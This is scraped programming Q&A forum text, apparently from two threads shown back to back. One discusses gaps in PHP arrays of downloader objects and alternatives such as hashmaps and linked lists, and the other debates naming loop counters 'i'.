function add_download($url) {
global $downloads;
static $download_counter;
$download_counter++;
$downloads[$download_counter] = new DownloaderObject($url);
}
That would work, but we still get holes in the array:
array(
1 => DownloaderObject,
3 => DownloaderObject,
7 => DownloaderObject,
13 => DownloaderObject
)
That's ugly. However, is that acceptable? Should the array be "defragmented", i.e. the keys rearranged to eliminate blank spaces?
Or is there another programmatic structure I should be aware of? I want a structure that I can add stuff to, remove stuff from, refer to keys in a variable, iterate through, etc., that is not an array. Does such a thing exist?
I have been coding for years, but this question has bugged me for very many of those years, and I am still not aware of an answer. This may be obvious to some programmers, but is extremely non-trivial to me.
The problem with PHP's "associative arrays" is that they aren't arrays at all, they're Hashmaps. Having holes there is perfectly fine. You might look at a linked list, as well, but a Hashmap seems perfectly suited to what you're doing.
What is maintaining your array of downloaders?
If you encapsulate the array in a class that is notified by the downloader when it is finished you won't have to worry about stale references to destroyed objects.
This class can manage the organisation of the array internally and present an interface to its users that looks more like an iterator than an array.
"$i++ loops" are nooby, but only because the code becomes much clearer if you use a for loop:
$i = 0;
while ($i < count($downloads) - 1) {
if (!is_object($downloads[$i])) {
$downloads[$i] = new DownloaderObject('http://somesite.com/doctorwho.iso');
break;
}
$i++;
}
Becomes
for($i=0;$i<count($downloads)-1;++$i){
if (!is_object($downloads[$i])) {
$downloads[$i] = new DownloaderObject('http://somesite.com/doctorwho.iso');
break;
}
}
Coming from a C# perspective, my first thought would be that you need a different data structure to an array - you need to think about the problem using a higher-level data structure. Perhaps a Queue, List or Stack would suit your purposes better?
The short answer to your question is that in PHP arrays are used for almost everything and you rarely end up using other data structures. Having holes in your array indexes isn't anything to worry about. In other programming languages such as Java you have a more diverse set of data structures to choose from: Sets, Hashes, Lists, Vectors and more. It seems that you would also need to have a closer interaction between the Array and DownloaderObject class. Just because the object $download2 has "destroyed()" itself the array will maintain a reference to that object.
Some good answers to this question, which reflect on the relative experience on the answerers. Thank you very much — they proved very educational.
I posted this question nearly three years ago. In hindsight, I can see my knowledge in that area was severely lacking. The biggest problem I had was that I was coming from a PHP perspective, which does not have the ability to arbitrarily pop elements. Something the other answers to this question helped me to discover was that a fundamentally superior model is 'linked lists'.
For C, I wrote a blog post about linked lists which contains code samples (too numerous to post here) but would neatly fill the original question's use case.
For PHP, a linked list implementation appears here, which I have never tried, but imagine it would also be the right way to deal with the above.
Interestingly, Python lists contain the pop() method which, unlike PHP's array_pop(), can pop arbitrary elements and keep everything in order. For example:
>>> x = ['baa', 'ram', 'ewe'] # our starting point
>>> x[1] # making sure element 1 is 'ram'
'ram'
>>> x.pop(1) # let's arbitrarily pop an element in the middle
'ram'
>>> x # the one we popped ('ram') is now gone
['baa', 'ewe']
>>> x[1] # and there are no holes: item 2 has become item 1
'ewe'
Closed. This question is opinion-based. It is not currently accepting answers.
Want to improve this question? Update the question so it can be answered with facts and citations by editing this post.
Closed 7 years ago.
Improve this question
As far as variable naming conventions go, should iterators be named i or something more semantic like count? If you don't use i, why not? If you feel that i is acceptable, are there cases of iteration where it shouldn't be used?
Depends on the context I suppose. If you where looping through a set of Objects in some
collection then it should be fairly obvious from the context what you are doing.
for(int i = 0; i < 10; i++)
{
// i is well known here to be the index
objectCollection[i].SomeProperty = someValue;
}
However if it is not immediately clear from the context what it is you are doing, or if you are making modifications to the index you should use a variable name that is more indicative of the usage.
for(int currentRow = 0; currentRow < numRows; currentRow++)
{
for(int currentCol = 0; currentCol < numCols; currentCol++)
{
someTable[currentRow][currentCol] = someValue;
}
}
"i" means "loop counter" to a programmer. There's nothing wrong with it.
Here's another example of something that's perfectly okay:
foreach (Product p in ProductList)
{
// Do something with p
}
I tend to use i, j, k for very localized loops (only exist for a short period in terms of number of source lines). For variables that exist over a larger source area, I tend to use more detailed names so I can see what they're for without searching back in the code.
By the way, I think that the naming convention for these came from the early Fortran language where I was the first integer variable (A - H were floats)?
i is acceptable, for certain. However, I learned a tremendous amount one semester from a C++ teacher I had who refused code that did not have a descriptive name for every single variable. The simple act of naming everything descriptively forced me to think harder about my code, and I wrote better programs after that course, not from learning C++, but from learning to name everything. Code Complete has some good words on this same topic.
i is fine, but something like this is not:
for (int i = 0; i < 10; i++)
{
for (int j = 0; j < 10; j++)
{
string s = datarow[i][j].ToString(); // or worse
}
}
Very common for programmers to inadvertently swap the i and the j in the code, especially if they have bad eyesight or their Windows theme is "hotdog". This is always a "code smell" for me - it's kind of rare when this doesn't get screwed up.
i is so common that it is acceptable, even for people that love descriptive variable names.
What is absolutely unacceptable (and a sin in my book) is using i,j, or k in any other context than as an integer index in a loop.... e.g.
foreach(Input i in inputs)
{
Process(i);
}
i is definitely acceptable. Not sure what kind of justification I need to make -- but I do use it all of the time, and other very respected programmers do as well.
Social validation, I guess :)
Yes, in fact it's preferred since any programmer reading your code will understand that it's simply an iterator.
What is the value of using i instead of a more specific variable name? To save 1 second or 10 seconds or maybe, maybe, even 30 seconds of thinking and typing?
What is the cost of using i? Maybe nothing. Maybe the code is so simple that using i is fine. But maybe, maybe, using i will force developers who come to this code in the future to have to think for a moment "what does i mean here?" They will have to think: "is it an index, a count, an offset, a flag?" They will have to think: "is this change safe, is it correct, will I be off by 1?"
Using i saves time and intellectual effort when writing code but may end up costing more intellectual effort in the future, or perhaps even result in the inadvertent introduction of defects due to misunderstanding the code.
Generally speaking, most software development is maintenance and extension, so the amount of time spent reading your code will vastly exceed the amount of time spent writing it.
It's very easy to develop the habit of using meaningful names everywhere, and once you have that habit it takes only a few seconds more to write code with meaningful names, but then you have code which is easier to read, easier to understand, and more obviously correct.
I use i for short loops.
The reason it's OK is that I find it utterly implausible that someone could see a declaration of iterator type, with initializer, and then three lines later claim that it's not clear what the variable represents. They're just pretending, because they've decided that "meaningful variable names" must mean "long variable names".
The reason I actually do it, is that I find that using something unrelated to the specific task at hand, and that I would only ever use in a small scope, saves me worrying that I might use a name that's misleading, or ambiguous, or will some day be useful for something else in the larger scope. The reason it's "i" rather than "q" or "count" is just convention borrowed from mathematics.
I don't use i if:
The loop body is not small, or
the iterator does anything other than advance (or retreat) from the start of a range to the finish of the loop:
i doesn't necessarily have to go in increments of 1 so long as the increment is consistent and clear, and of course might stop before the end of the iterand, but if it ever changes direction, or is unmodified by an iteration of the loop (including the devilish use of iterator.insertAfter() in a forward loop), I try to remember to use something different. This signals "this is not just a trivial loop variable, hence this may not be a trivial loop".
If the "something more semantic" is "iterator" then there is no reason not to use i; it is a well understood idiom.
i think i is completely acceptable in for-loop situations. i have always found this to be pretty standard and never really run into interpretation issues when i is used in this instance. foreach-loops get a little trickier and i think really depends on your situation. i rarely if ever use i in foreach, only in for loops, as i find i to be too un-descriptive in these cases. for foreach i try to use an abbreviation of the object type being looped. e.g:
foreach(DataRow dr in datatable.Rows)
{
//do stuff to/with datarow dr here
}
anyways, just my $0.02.
It helps if you name it something that describes what it is looping through. But I usually just use i.
As long as you are either using i to count loops, or part of an index that goes from 0 (or 1 depending on PL) to n, then I would say i is fine.
Otherwise its probably easy to name i something meaningful it its more than just an index.
I should point out that i and j are also mathematical notation for matrix indices. And usually, you're looping over an array. So it makes sense.
As long as you're using it temporarily inside a simple loop and it's obvious what you're doing, sure. That said, is there no other short word you can use instead?
i is widely known as a loop iterator, so you're actually more likely to confuse maintenance programmers if you use it outside of a loop, but if you use something more descriptive (like filecounter), it makes code nicer.
It depends.
If you're iterating over some particular set of data then I think it makes more sense to use a descriptive name. (eg. filecounter as Dan suggested).
However, if you're performing an arbitrary loop then i is acceptable. As one work mate described it to me - i is a convention that means "this variable is only ever modified by the for loop construct. If that's not true, don't use i"
The use of i, j, k for INTEGER loop counters goes back to the early days of FORTRAN.
Personally I don't have a problem with them so long as they are INTEGER counts.
But then I grew up on FORTRAN!
my feeling is that the concept of using a single letter is fine for "simple" loops, however, i learned to use double-letters a long time ago and it has worked out great.
i asked a similar question last week and the following is part of my own answer:// recommended style ● // "typical" single-letter style
●
for (ii=0; ii<10; ++ii) { ● for (i=0; i<10; ++i) {
for (jj=0; jj<10; ++jj) { ● for (j=0; j<10; ++j) {
mm[ii][jj] = ii * jj; ● m[i][j] = i * j;
} ● }
} ● }
in case the benefit isn't immediately obvious: searching through code for any single letter will find many things that aren't what you're looking for. the letter i occurs quite often in code where it isn't the variable you're looking for.
i've been doing it this way for at least 10 years.
note that plenty of people commented that either/both of the above are "ugly"...
I am going to go against the grain and say no.
For the crowd that says "i is understood as an iterator", that may be true, but to me that is the equivalent of comments like 'Assign the value 5 to variable Y. Variable names like comment should explain the why/what not the how.
To use an example from a previous answer:
for(int i = 0; i < 10; i++)
{
// i is well known here to be the index
objectCollection[i].SomeProperty = someValue;
}
Is it that much harder to just use a meaningful name like so?
for(int objectCollectionIndex = 0; objectCollectionIndex < 10; objectCollectionIndex ++)
{
objectCollection[objectCollectionIndex].SomeProperty = someValue;
}
Granted the (borrowed) variable name objectCollection is pretty badly named too.